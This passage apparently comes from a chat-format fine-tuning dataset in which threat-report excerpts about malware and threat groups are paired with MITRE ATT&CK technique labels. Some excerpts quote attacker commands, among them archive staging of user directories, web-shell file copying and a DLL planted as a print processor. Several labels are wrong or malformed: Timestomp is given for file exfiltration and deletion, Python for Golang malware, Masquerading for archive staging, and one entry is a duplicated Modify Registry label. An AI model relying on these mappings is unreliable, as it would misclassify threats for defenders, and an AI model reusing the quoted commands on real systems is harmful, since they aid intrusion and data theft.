- "content": "T1562.006 - Impair Defenses: Indicator Blocking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has obtained and used tools such as Mimikatz, Cobalt Strike, and AdFind."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This behavior is detailed later in the blog under \"Malware Functionality\". Unlike WannaCry, Nyetya does not appear to contain an external scanning component. Two of the executables are used to recover user credentials (32 and 64 bits) while the third one is the PsExec binary. For example: The dropped .tmp executable seems to be based on Mimikatz, a popular open source tool used for recovery of user credentials from computer memory using several different techniques. The recovered credentials are then used for launching malware on the remote system using WMIC and PsExec. These mechanisms are used to attempt installation and execution of perfc.dat on other devices to spread laterally. The two exploits drop a modified version of DoublePulsar which is a persistent backdoor running in kernel space of the compromised system. The developer modified only few bytes from the original version but this modification allowed it to evade network detection and the open source DoublePulsar scanning tools available on the Internet. The modification can be divided in 3 parts: - The attacker modified the command codes: - The attacker modified the response codes: - The attacker modified where the response code is stored in the SMB response packet. PsExec is used to execute the following instruction (where w.x.y.z is an IP address) using the current user's windows token (from the \"Recovery of User Credentials\" section above) to install the malware on the networked device. WMI is used to execute the following command which performs the same function as above, but using the current user's username and password (as username and password), retrieved from the \"Recovery of User Credentials\" section above"
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors used the following command following exploitation of a machine with malware to display network connections: netstat -ano >> %temp%\\download"
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shark can query `HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography MachineGuid` to retrieve the machine GUID."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a keylogger to capture keystrokes it then sends back to the server after it is stopped."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AQUATIC PANDA continued their reconnaissance from the host, using native OS binaries to understand current privilege levels as well as system and domain details"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "iKitten saves itself with a leading \".\" so that it's hidden from users by default."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BITSAdmin can be used to create BITS Jobs to launch a malicious process."
- },
- {
- "role": "assistant",
- "content": "T1197 - BITS Jobs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conficker scans for other machines to infect."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lokibot has tricked recipients into enabling malicious macros by getting victims to click \"enable content\" in email attachments."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Efforts to decrease operational visibility included placing tool and output files within temporary file system mount points that were stored in volatile memory. Additionally, UNC1945 used built-in utilities and public tools to modify timestamps and selectively manipulate Unix log files."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FELIXROOT adds a shortcut file to the startup folder for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mongall can upload files and information from a compromised host to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RawPOS installs itself as a service to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once communication with the C2 server has been established, QakBot is known to download and use additional modules in order to perform its malicious operations"
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TClient is injected into dllhost.exe Malware Analysis wab32res.dll (FakeRun loader) loads TClient"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRat has been delivered as a package that includes compressed DLL and shellcode payloads within a .dat file."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 uses steganography to send images to users that are embedded with shellcode."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive: YYYY-MM-DD hh:mm:ss quser YYYY-MM-DD hh:mm:ss C:\\windows\\temp\\svchost.exe a -m5 -v2000m -hp{password} -inul -r \"{destination_file.rar}\" \"{multiple user directories linked to the victim's projects}\" -x*.exe -x*.msi -x*.cab -x*.inc -x*.dll -x*.db -x*.mdb -x*.htm -x*.html -x*.css -x*.jar -x*.js -x*.tmp -x*.bak -x*.dat -x*.log -x*.xml -x*.dmp -x*.dbf -x*.avi -x*.mp3 -x*.mp4 -x*.mpg -x*.mpeg -x*.asp -x*.aspx -x*.gif -x*.jpg -x*.mpp -x*.pst The threat actors typically rename the encrypted RAR archives"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Windigo has used a script to gather credentials in files left on disk by OpenSSH backdoors."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gold Dragon uses HTTP for communication to the control servers."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turian can establish persistence by adding Registry Run keys."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CSPY Downloader can download additional tools to a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The worm also includes code to scan for open Docker API’s using masscan, then spin up docker images and install itself"
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WastedLocker can execute itself as a service."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ajax Security Team has used various social media channels to spearphish victims."
- },
- {
- "role": "assistant",
- "content": "T1566.003 - Spearphishing via Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SamSam encrypts victim files using RSA-2048 encryption and demands a ransom be paid in Bitcoin to decrypt those files."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encodes C2 traffic with base64."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEMP.Veles routinely deleted tools, logs, and other files after they were finished with them."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Read a specified file’s contents and send the data to the control server Write data sent by the control server to an existing file Mark a file to be deleted on reboot Marking a file for deletion on reboot"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp', 'T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cyclops Blink can use non-standard ports for C2 not typically associated with HTTP or HTTPS traffic."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SharpStage has the ability to download and execute additional payloads via a DropBox API."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "From those servers the threat actor could use a web shell to retrieve the encrypted archives: copy \\\\{FILE PATH}\\c$\\programdata\\*.tmp \\\\{FILE PATH}\\ServiceDesk\\custom\\style After exfiltrating the files, the threat actor used web shell access on the staging server to delete the staged RAR archives and detach their network shares, likely to avoid detection"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In at least one instance of EnvyScout delivery, we observed further enumeration of the executing browser’s environment, wherein the user-agent was used to determine whether a Windows machine received an ISO payload. If the visitor arrived via iOS, they were redirected to external infrastructure"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PyDCrypt has attempted to execute with PowerShell."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses HTTPS for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of enumerating application windows."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has used RTF document that includes an exploit to execute malicious code. (CVE-2017-11882)"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Meteor can use PowerShell commands to disable the network adapters on a victim machines."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "searches for interesting files (either a default or customized set of file extensions) on removable media and copies them to a staging area. The default file types copied would include data copied to the drive by ."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chrommme can decrypt its encrypted internal code."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Victims are targeted by watering hole attacks, and emails with links to malicious websites or with malicious attachments"
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link', 'T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLUELIGHT can collect passwords stored in web browers, including Internet Explorer, Edge, Chrome, and Naver Whale."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of injecting code into the APC queue of a created process as part of an \"Early Bird injection.\""
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca used the command `move [file path] c:\\windows\\system32\\spool\\prtprocs\\x64\\spool.dll` to move and register a malicious DLL name as a Windows print processor, which eventually was loaded by the Print Spooler service."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LoudMiner used a batch script to run the Linux virtual machine as a service."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers information about the Registry."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TSCookie has the ability to identify the IP of the infected host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is used to enumerate and dump information from Microsoft SharePoint."
- },
- {
- "role": "assistant",
- "content": "T1213 - Data from Information Repositories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Each of these weaponized documents used the same tactic for their attacks. Upon opening the document, it leveraged the ability of Microsoft Word to retrieve a remote template to then load a malicious macro document as seen in Figure 4"
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BISCUIT can capture keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Xbash can obtain a list of weak passwords from the C2 server to use for brute forcing as well as attempt to brute force services with open ports."
- },
- {
- "role": "assistant",
- "content": "T1110.001 - Brute Force: Password Guessing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It uses the string 5cd8f17f4086744065eb0992a09e05a2 as its mutex as well as its registry hive in the affected machine. It uses the value tcpClient_0 as its HTTP server, where it will receive all stolen information from the infected machine. However, since the value was set to null, all stolen information will be sent to the same C&C server"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Central Command network, including computers both in the headquarters and in the combat zones.The threat involved into this incident is referred as Agent.btz. There is even a clash with another threat that is also detected as Agent.btz by another vendor – but that's a totally different threat with different functionality. When loaded, its exported function DllEntryPoint() will be called automatically. Once a removable disk is connected to a computer infected with Agent.btz, the active malware will detect a newly recognized drive. It will drop its copy on it and it will create autorun.inf file with an instruction to run that file. Agent.btz file is not packed. Thus, it’s not known what kind of code could have been injected into the browser process. Agent.btz locates this resource by looking for a marker 0xAA45F6F9 in its memory map.File wmcache.nldThe second spawned thread will wait for 10 seconds. The collected network details are also saved into the log file.File winview.ocxThe second spawned thread will log threat activity into the file %system32%\\winview.ocx.This file is also encrypted with the same XOR mask. Note: an attempt to run a valid thumb.db file, which is an OLE-type container has no effect.Files thumb.dd and mssysmgr.ocxAgent.btz is capable to create a binary file thumb.dd on a newly connected drive"
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Last week, Unit 42 released a blog on a newly named threat group called DarkHydrus that we observed targeting government entities in the Middle East. The attack that we discussed in our previous publication involved spear-phishing to deliver a PowerShell payload we call RogueRobin; however, we are aware of DarkHydrus carrying out a credential harvesting attack in June 2018. It also appears that this an ongoing campaign, as we have evidence of previous credential harvesting attempts using the same infrastructure dating back to the Fall of 2017. The credential harvesting attacks used spear-phishing emails that contained malicious Microsoft Office documents that leveraged the “attachedTemplate” technique to load a template from a remote server. When attempting to load this remote template, Microsoft Office will display an authentication dialog box to ask the user to provide login credentials. When entered, these credentials are then sent to the C2 server, which allows DarkHydrus to collect the user account credentials. Based on Unit 42’s analysis, DarkHydrus used the open-source Phishery tool to create two of the known Word documents used in these credential harvesting attacks. As discussed in our previous blog, this further strengthens DarkHydrus’ use of the open source for their attack tools. A phishing attack to steal credentials like this is not new: US-CERT warned of the same technique by a different threat group in 2017. Based on this, we can reasonably presume this group will continue to carry out attacks against these kinds of targets in the Middle East in the near-future"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT has included a base64 encoded executable."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay can insert itself into the address space of other applications using the AppInit DLL Registry key."
- },
- {
- "role": "assistant",
- "content": "T1546.010 - Event Triggered Execution: AppInit DLLs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cutwail spam levels in the last three months have been significantly lower. The introduction of steganography may suggest that NARWHAL SPIDER has been developing new, innovative methods to evade detection and improve infection rates. Although not commonly used by eCrime actors, steganography has been used for malware delivery in the past, such as the Lurk Downloader and StegoLoader."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography', 'T1001.002 - Data Obfuscation via Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EVILNUM has a function called \"DeleteLeftovers\" to remove certain artifacts of the attack."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a Registry subkey that registers a new system device."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry', 'T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After decrypting the strings, they must be further decompressed using LZNT1"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "decrypts code, strings, and commands to use once it's on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Moses Staff has used obfuscated web shells in their operations."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Anomali Labs has detected a new campaign by the threat group Rocke. In this campaign, the group has changed from using a Python-based malware to a malware written in Golang. The detection of this new malware is nearly non-existent. In addition, the group uses a private mining pool to reduce the risks of being detected"
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used a Metasploit PowerShell module to download and execute shellcode and to set up a local listener."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has deleted tmp and prefetch files during post compromise cleanup activities."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some Felismus samples use a custom encryption method for C2 traffic that utilizes AES and multiple keys."
- },
- {
- "role": "assistant",
